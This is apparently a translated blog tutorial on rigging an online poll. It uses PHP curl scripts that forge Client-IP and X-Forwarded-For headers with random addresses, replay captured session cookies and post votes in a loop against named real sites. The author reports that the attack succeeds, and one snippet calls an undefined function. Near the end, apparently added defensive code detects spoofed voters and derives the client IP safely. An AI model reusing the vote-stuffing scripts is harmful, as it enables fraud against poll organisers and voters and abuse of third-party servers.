Cause:
My colleague's friend's sister wants to take part in an online voting activity and asked me to help stuff the vote. I agreed, in the spirit of research. Here I would like to share my approach to vote stuffing.
Thoughts:
First, websites generally use the IP address to limit voting. If the IP address can be forged, vote stuffing becomes possible.
Let's look at how the open-source PHP project Discuz obtains the client IP address:
    // Obtain the client IP
    function get_ip() {
        if (getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
            $ip = getenv('HTTP_CLIENT_IP');
        } elseif (getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
            $ip = getenv('HTTP_X_FORWARDED_FOR');
        } elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
            $ip = getenv('REMOTE_ADDR');
        } elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
            $ip = $_SERVER['REMOTE_ADDR'];
        }
        return preg_match('/[\d\.]{7,15}/', $ip, $matches) ? $matches[0] : '';
    }
The code checks HTTP_CLIENT_IP first. That value is filled from the Client-IP request header, so the client can forge it. Forging it from a PHP script requires the curl extension.
After searching Baidu for curl usage, the simplest code that uses curl to forge the IP is as follows:
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "http://localhost/2.php");
    $a = rand(1, 255);
    $b = rand(1, 255);
    $c = rand(1, 50);
    $d = rand(1, 255);
    $ip = "$a.$b.$c.$d"; // dynamically generate the IP address
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR:'.$ip, 'CLIENT-IP:'.$ip)); // set the forged IP headers
    curl_setopt($ch, CURLOPT_REFERER, "http://www.baidu.com"); // set the Referer
    curl_setopt($ch, CURLOPT_HEADER, 1);
    $out = curl_exec($ch);
    curl_close($ch);
In this way, curl lets us forge the IP address that such a function reads from the request headers. That is the theoretical basis of vote stuffing; now we can use this code to try it.
First Attempt:
First, vote normally once.
Firebug in Firefox shows that the vote is submitted as an Ajax POST with two parameters, tid and type. The previous code sent a GET request, so it has to be modified so that curl uses the POST method. The modified code is as follows:
    $url = "http://www.officeshow.cn/vote.php";
    $a = rand(1, 255);
    $b = rand(1, 255);
    $c = rand(1, 50);
    $d = rand(1, 255);
    $ip = "$a.$b.$c.$d";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR:'.$ip, 'CLIENT-IP:'.$ip)); // set the forged IP headers
    curl_setopt($ch, CURLOPT_REFERER, "http://www.gosoa.com.cn/"); // set the Referer
    curl_setopt($ch, CURLOPT_HEADER, 0);
    $out = curl_exec($ch);
    curl_close($ch);
    exit;
With the code above finished, let's try to stuff the vote. Running this PHP file fails! So we continue to explore.
Success:
Many websites use cookies and sessions to store user information; in other words, it is kept locally in cookies. Although this vote does not require login, many websites set cookies as soon as they are opened. Check the cookies of this site. The blogger uses Firefox.
We found that this domain has two cookie values: bd1__firstime and PHPSESSID. With Firefox we can read these two cookie values and then pass them along through curl. The server will then think this is a normal request, and the vote stuffing works. Try the following code:
    $url = "http://www.officeshow.cn/vote.php";
    $a = rand(1, 255);
    $b = rand(1, 255);
    $c = rand(1, 50);
    $d = rand(1, 255);
    $ip = "$a.$b.$c.$d";
    $cookie = "bd1__firstime=1367826762029; PHPSESSID=Taobao"; // set the cookie value
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR:'.$ip, 'CLIENT-IP:'.$ip, 'Cookie:'.$cookie)); // set the forged IP headers and the cookie
    curl_setopt($ch, CURLOPT_REFERER, "http://www.baidu.com"); // set the Referer
    curl_setopt($ch, CURLOPT_POSTFIELDS, 'tid=2200&type=1');
    curl_setopt($ch, CURLOPT_HEADER, 0);
    ob_start();
    $out = curl_exec($ch);
    $result = ob_get_contents();
    ob_end_clean();
    curl_close($ch);
    echo json_encode(getd('id')); // getd() is not defined anywhere in this post
    exit;
Run the code. Successful!
Batch operation:
The vote-stuffing code is now complete. What remains is the batch operation. A batch is really just a for loop, but a request made from the browser has a maximum execution time, which is inconvenient.
I used Ajax to send the requests in a loop, so that we can get all the votes.
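From the server's side, the batch described above leaves a recognisable trace: one connecting address and one session cookie show up with many different header-claimed IPs. The following is an added example, not code from the original post, that flags this in a vote log; the record fields, the threshold and the function name are assumptions, and the sample records are constructed.

```php
<?php
// Constructed vote-log records (assumed fields): 'remote' is the socket peer
// (REMOTE_ADDR), 'claimed' is the IP taken from Client-IP / X-Forwarded-For,
// 'sid' is the PHPSESSID cookie, 'tid' is the thread voted for.
$votes = [
    ['remote' => '203.0.113.9',  'claimed' => '17.201.33.4',  'sid' => 'sess-A', 'tid' => 2200],
    ['remote' => '203.0.113.9',  'claimed' => '88.14.7.190',  'sid' => 'sess-A', 'tid' => 2200],
    ['remote' => '203.0.113.9',  'claimed' => '140.9.22.61',  'sid' => 'sess-A', 'tid' => 2200],
    ['remote' => '203.0.113.9',  'claimed' => '201.77.45.12', 'sid' => 'sess-A', 'tid' => 2200],
    ['remote' => '198.51.100.7', 'claimed' => '198.51.100.7', 'sid' => 'sess-B', 'tid' => 2200],
    ['remote' => '192.0.2.44',   'claimed' => '192.0.2.44',   'sid' => 'sess-C', 'tid' => 2198],
];

// Return every socket address or session id that presented more than
// $maxClaimed distinct header-claimed IPs, with the number it presented.
function flag_spoofed_voters(array $votes, int $maxClaimed = 2): array
{
    $claimedBy = [];
    foreach ($votes as $v) {
        foreach (['remote', 'sid'] as $field) {
            // Use the claimed IP as an array key so duplicates collapse.
            $claimedBy[$field . '=' . $v[$field]][$v['claimed']] = true;
        }
    }
    $flagged = [];
    foreach ($claimedBy as $source => $ips) {
        if (count($ips) > $maxClaimed) {
            $flagged[$source] = count($ips);
        }
    }
    return $flagged;
}

foreach (flag_spoofed_voters($votes) as $source => $n) {
    echo "$source presented $n different claimed IPs\n";
}
```

The check only works if the application logs REMOTE_ADDR and the session id next to the header-derived address instead of storing the latter alone.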
Extension:
The most important part of this vote stuffing is passing the cookie. In fact, you can send all of the headers of a normal browser request, because you cannot know which checks the server side applies. View the header information with Firebug, then pass all of it through curl.
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        "Cookie:stQE_45b4_saltkey=njAO8S3G; stQE_45b4_lastvisit=1367823144; stQE_45b4_visitedfid=62D66D79D63; pgv_pvi=9600479659; __utma=29738476.2090210183.1367826762.1367826762.1367826762.1; __utmz=29738476.1367826762.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bdshare_firstime=1367826762029; stQE_45b4_sid=DG6gx1; stQE_45b4_lastact=1368695577%09forum.php%09viewthread; stQE_45b4_viewid=tid_2200; PHPSESSID=b681ua42r0gpst2gvth6irh9a7; pgv_info=ssi=s2710992270; stQE_45b4_sendmail=1; stQE_45b4_forum_lastvisit=D_63_1368695475D_2_1368695494",
        'Host:'.'bbs.officeshow.cn',
        "Referer:http://bbs.officeshow.cn/forum.php?mod=viewthread&tid=2200",
        "X-Requested-With: XMLHttpRequest",
        'X-FORWARDED-FOR:'.$ip,
        'CLIENT-IP:'.$ip,
        'X-Requested-With:XMLHttpRequest'
    ));
Postscript:
If the server determines the IP address using $_SERVER['REMOTE_ADDR'], this method is ineffective.
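The postscript's point as a hardened counterpart to get_ip(): an added example, not Discuz's code and not from the original post, that trusts X-Forwarded-For only when the connection itself comes from a known reverse proxy. The function name client_ip(), the TRUSTED_PROXIES list and the sample requests are assumptions, and the proxy is assumed to append the connecting address to X-Forwarded-For.

```php
<?php
// Assumed deployment setting (constructed values): addresses of our own reverse proxies.
const TRUSTED_PROXIES = ['10.0.0.5', '10.0.0.6'];

function client_ip(array $server, array $trustedProxies = TRUSTED_PROXIES): string
{
    // REMOTE_ADDR is the peer of the TCP connection; a request header cannot set it.
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return '';
    }
    // Direct connection: ignore Client-IP and X-Forwarded-For entirely.
    if (!in_array($remote, $trustedProxies, true)) {
        return $remote;
    }
    // Behind our proxy: walk X-Forwarded-For from right to left, skip our own
    // proxies and take the first other address. Anything further left was
    // supplied by the client and is never used.
    $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? ''));
    foreach (array_reverse($hops) as $hop) {
        if (filter_var($hop, FILTER_VALIDATE_IP) === false) {
            break; // malformed entry: stop trusting the chain
        }
        if (!in_array($hop, $trustedProxies, true)) {
            return $hop;
        }
    }
    return $remote;
}

// Constructed requests: a direct client sending forged headers, and a client
// behind our proxy that put a forged address at the front of X-Forwarded-For.
$spoofedDirect = [
    'REMOTE_ADDR'          => '203.0.113.9',
    'HTTP_CLIENT_IP'       => '8.8.8.8',
    'HTTP_X_FORWARDED_FOR' => '8.8.8.8',
];
$viaProxy = [
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => '8.8.8.8, 198.51.100.7',
];

echo client_ip($spoofedDirect), "\n";
echo client_ip($viaProxy), "\n";
```

In both sample requests the forged 8.8.8.8 is ignored: the first resolves to the connecting address, the second to the address the proxy appended.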